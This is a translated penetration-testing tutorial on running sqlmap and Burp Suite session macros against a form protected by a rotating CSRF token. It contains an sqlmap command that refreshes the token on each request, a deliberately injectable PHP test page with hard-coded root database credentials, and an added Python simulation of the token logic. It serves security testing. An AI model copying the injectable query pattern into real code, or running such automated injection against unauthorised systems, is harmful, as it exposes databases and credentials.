C4bbage 2014/06/28 12:15

from: http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-1/

http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-2/


Question: http://drops.wooyun.org/tips/2444

Another case (eval): gist.github.com/McSimp/2602…

When testing some sites for injection we run into CSRF tokens that would otherwise have to be handled by hand or by writing custom tooling; here they are handled with sqlmap and Burp Suite.

With sqlmap (the --eval code fetches a fresh token before every request):

user@host:/pentest/databases/sqlmap$ python sqlmap.py -u "http://192.168.83.117/2.php" --data="token=123&id=root" --eval="import urllib2;import re;a=urllib2.build_opener();a.addheaders.append(('Cookie','PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05'));token=re.search(r'\w{32}',a.open('http://192.168.83.117/2.php').read()).group(0);print token;" -p id --dbs --cookie="PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05" --current-user

Burp Suite is as follows:

Burp Suite has a session handling mechanism that lets us automate this. The test page (2.php) used in the example is:

<?php
session_start();
var_dump($_REQUEST);

function set_token() {
    $_SESSION['token'] = md5(microtime(true));
}

function valid_token() {
    $return = $_REQUEST['token'] === $_SESSION['token'];
    set_token();   // rotate the token on every check, valid or not
    return $return;
}

// If there is no token yet, generate one
if (!isset($_SESSION['token']) || $_SESSION['token'] == '') {
    set_token();
}

error_reporting(E_USER_ERROR | E_USER_WARNING | E_USER_NOTICE);
@mysql_connect('127.0.0.1' . ':' . '3306', 'root', '123') or die("database server connection failure");
@mysql_select_db('mysql') or die("database does not exist or not available");

if (isset($_POST['id'])) {
    if (!valid_token()) {
        echo "token error";
    } else {
        $id = $_REQUEST['id'];
        // Deliberately injectable test target: id is concatenated into the query unescaped
        $sql = "select user,password,host from mysql.user where user='" . $id . "' limit 0,1";
        echo $sql;
        $set_result = mysql_query($sql);
        $result = array();
        while ($row = mysql_fetch_array($set_result)) {
            $result[] = $row;
        }
        var_dump($result);
    }
}
//echo "SESSION ".$_SESSION['token'];
?>
<form method="post" action="">
    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
    <input type="text" name="id" value="root">
    <input type="submit" value="submit" />
</form>
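As an added illustration of why the token refresh is needed (this is example code, not from the original post, from sqlmap or from Burp): the Python below models the token logic of the 2.php page above in a small in-process stand-in and performs the same fetch-then-submit sequence that the --eval one-liner runs before each sqlmap request. The server class, the session id and the use of secrets.token_hex in place of md5(microtime(true)) are constructed for the example; the regex anchors on the hidden field name, which is an assumption about the form rather than the bare \w{32} pattern the command uses.

```python
import re
import secrets


# --- Constructed stand-in for the 2.php test page above (not a real web server) ---

class TokenServer:
    """Mimics 2.php: one CSRF token per session, rotated on every form submission."""

    def __init__(self):
        self.sessions = {}  # PHPSESSID -> {'token': ...}

    def _set_token(self, sess):
        # 2.php uses md5(microtime(true)); a random 32-hex-char value has the same shape
        sess['token'] = secrets.token_hex(16)

    def _session(self, sessid):
        sess = self.sessions.setdefault(sessid, {})
        if not sess.get('token'):          # "if there is no token yet, generate one"
            self._set_token(sess)
        return sess

    def get(self, sessid):
        """GET /2.php: render the form carrying the current token (GET does not rotate it)."""
        sess = self._session(sessid)
        return ('<form method="post" action="">'
                '<input type="hidden" name="token" value="%s">'
                '<input type="text" name="id" value="root">'
                '<input type="submit" value="submit" /></form>' % sess['token'])

    def post(self, sessid, data):
        """POST /2.php: valid_token() compares, then rotates the token whether or not it matched."""
        sess = self._session(sessid)
        if 'id' not in data:
            return self.get(sessid)
        ok = data.get('token') == sess['token']
        self._set_token(sess)
        if not ok:
            return 'token error'
        # 2.php concatenates id straight into SQL; here we only echo the query it would build
        return "select user,password,host from mysql.user where user='%s' limit 0,1" % data['id']


# --- Client side: what the sqlmap --eval one-liner does before every request ---

TOKEN_RE = re.compile(r'name="token"\s+value="([0-9a-f]{32})"')


def extract_token(html):
    """Read the token out of the hidden form field.

    Anchoring on the field name is safer than the bare \\w{32} of the --eval snippet,
    which matches any 32-character word on the page, not just the token.
    """
    m = TOKEN_RE.search(html)
    if m is None:
        raise ValueError('no token field in response')
    return m.group(1)


def send_with_fresh_token(server, sessid, id_value):
    """GET the form, pull the current token, then POST the test value with it."""
    token = extract_token(server.get(sessid))
    return server.post(sessid, {'token': token, 'id': id_value})


def demo():
    """Three submissions in one session: accepted, rejected (stale token), accepted (refreshed)."""
    srv = TokenServer()
    sid = 'constructed-session-id'
    first = extract_token(srv.get(sid))
    r1 = srv.post(sid, {'token': first, 'id': 'root'})    # first use of the token: accepted
    r2 = srv.post(sid, {'token': first, 'id': 'root1'})   # token was rotated by r1: rejected
    r3 = send_with_fresh_token(srv, sid, 'root1')         # re-fetched token: reaches the query
    return r1, r2, r3


if __name__ == '__main__':
    for label, r in zip(('first', 'stale', 'refreshed'), demo()):
        print('%-9s %s' % (label, r))
```

The second submission fails because valid_token() rotates the token even on a successful check, so every request after the first needs a new GET; that is exactly what the --eval code supplies, since sqlmap takes an assignment to a variable named after a parameter (token = ...) as that parameter's new value for the current request. The Burp macro replays the same GET-then-POST pair, which is why it has to be restricted to updating only the token parameter and not the recorded id.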

1. On the Options tab, Sessions sub-tab, add a session handling rule. This opens the Session Handling Rule Editor, which has a Rule Description field and a Rule Actions section (the body of the rule).
2. Under Rule Actions add an action of type "Run a macro". This opens the Session Handling Action Editor; under "Select macro" click Add to create the macro, which opens the Macro Editor (used to analyse and configure the macro) together with the Macro Recorder (which records the requests).
3. With the Macro Recorder open, make sure Intercept is off (top right), switch to your browser, request 127.0.0.1/2.php once, then submit the form.
4. Switch back to the Macro Recorder, Ctrl-click to select both requests, and click OK.
5. Back in the Macro Editor, click "Test macro" to check that the token in the request and in the response are handled correctly.

If not, click "Re-analyze macro", or select the item and click "Configure item", to correct it, as shown below.

Once the Macro Editor is configured, the window returns to the Session Handling Action Editor. When I tested sqlmap through Burp Proxy, the macro set my id to root1 (the value recorded in the macro) and my payload was never sent; when fuzzing this problem did not occur. Configure the macro so that only the token parameter is updated, as shown in the following figure:

Select the macro you just recorded under "Select macro" and confirm. Back in the Session Handling Rule Editor, on its Scope tab, set the scope (as your situation requires):

The running results are as follows: